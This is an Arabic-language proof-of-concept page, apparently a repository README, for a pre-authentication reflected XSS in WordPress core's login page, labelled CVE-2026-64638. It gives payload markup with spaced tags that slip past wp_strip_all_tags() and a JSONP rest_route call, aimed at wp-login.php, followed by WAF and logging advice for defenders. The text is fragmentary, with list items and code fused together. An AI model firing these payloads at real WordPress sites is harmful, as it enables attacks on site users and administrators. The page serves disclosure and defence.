
CVE-2026-64638 (XSS2shell) POC.
إثبات مفهوم XSS انعكاسية قبل المصادقة في WordPress
إثبات مفهوم بملف HTML واحد لثغرة CVE-2026-64638 (XSS2Shell)، وهي ثغرة XSS تعتمد على الفروقات بين المحلِّلات في نواة WordPress. تُظهر تنفيذ JavaScript غير مصادق عليه في أصل WordPress عبر طلب تسجيل دخول مُصمَّم خصيصًا.
strip_tags() مقابل wp_kses_post())POC.html في محرر نصوص.http://TARGET/wp-login.php في خاصية action الخاصة بالنموذج بهدفك.<form id="poc" method="post" action="http://TARGET/wp-login.php">
confirm() (أو alert()) في أصل WordPress.< area id=ajaxurl href=/?rest_route=/&_method=GET&_jsonp=confirm&_envelope=1>
< div id=color-picker class=reset-pass-submit>
< button class="wp-generate-pw color-option">X
المسافة بعد كل < هي جوهر الاستغلال. بدونها، يزيل wp_strip_all_tags() كل شيء.
%3C + مسافة بيضاء في الحقل log على مستوى WAF/الحافة.POST /wp-login.php التي يحتوي فيها log على < مُرمَّز.